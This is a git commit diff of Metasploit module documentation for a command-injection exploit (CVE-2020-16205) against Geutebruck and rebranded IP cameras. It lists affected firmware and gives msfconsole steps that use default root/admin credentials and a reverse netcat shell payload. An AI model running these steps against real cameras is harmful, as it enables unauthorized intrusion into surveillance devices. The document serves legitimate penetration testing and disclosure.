Update geutebruck_testaction_exec.md
it should be better now :)
This commit is contained in:
parent
a14a2fe8d2
commit
e4f760691e
|
@ -1,6 +1,7 @@
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
|
||||||
[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models:
|
The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned:
|
||||||
|
Encoder and E2 Series Camera models:
|
||||||
G-Code:
|
G-Code:
|
||||||
EEC-2xxx
|
EEC-2xxx
|
||||||
G-Cam:
|
G-Cam:
|
||||||
|
@ -9,33 +10,48 @@ G-Cam:
|
||||||
ETHC-22xx
|
ETHC-22xx
|
||||||
EWPC-22xx
|
EWPC-22xx
|
||||||
|
|
||||||
|
Many brands use the same firmware:
|
||||||
|
UDP Technology (which is also the supplier of the firmware for the other vendors)
|
||||||
|
Ganz
|
||||||
|
Visualint
|
||||||
|
Cap
|
||||||
|
THRIVE Intelligence
|
||||||
|
Sophus
|
||||||
|
VCA
|
||||||
|
TripCorps
|
||||||
|
Sprinx Technologies
|
||||||
|
Smartec
|
||||||
|
Riva
|
||||||
|
|
||||||
|
This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
|
||||||
|
|
||||||
### Description
|
### Description
|
||||||
|
|
||||||
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
|
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
|
||||||
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
|
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
|
||||||
Tested it with the 1.12.14.5 firmware only.
|
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
List the steps needed to make sure this thing works
|
1. Start the camera using default configuration
|
||||||
|
2. Launch msfconsole
|
||||||
1. Do: `use exploit/linux/http/geutebruck_testaction_exec`
|
3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
|
||||||
2. Do: `set httpusername root`
|
4. Do: `set httpusername root`
|
||||||
3. Do: `set httppassword admin`
|
5. Do: `set httppassword admin`
|
||||||
4. Do: `set lhost 192.168.14.1`
|
6. Do: `set lhost <metasploit_ip>`
|
||||||
5. Do: `set rhosts 192.168.14.58`
|
5. Do: `set rhosts <camera_ip>`
|
||||||
6. Do: `set payload cmd/unix/reverse_netcat_gaping`
|
6. Do: `set payload cmd/unix/reverse_netcat_gaping`
|
||||||
7. Do: `check`
|
7. Do: `check` to be sure the target is vulnerable
|
||||||
8. Do: `exploit`
|
8. Do: `exploit`
|
||||||
|
9. You should get a shell
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
### HTTPUSERNAME
|
The default credentials to log on the web interface are root/admin.
|
||||||
|
|
||||||
|
### HTTPUSERNAME
|
||||||
A username used to authenticate on the admin page. **Default: root**
|
A username used to authenticate on the admin page. **Default: root**
|
||||||
|
|
||||||
### HTTPPASSWORD
|
### HTTPPASSWORD
|
||||||
|
|
||||||
The password of the username used to authenticate on the admin page. **Default: admin**
|
The password of the username used to authenticate on the admin page. **Default: admin**
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
Loading…
Reference in New Issue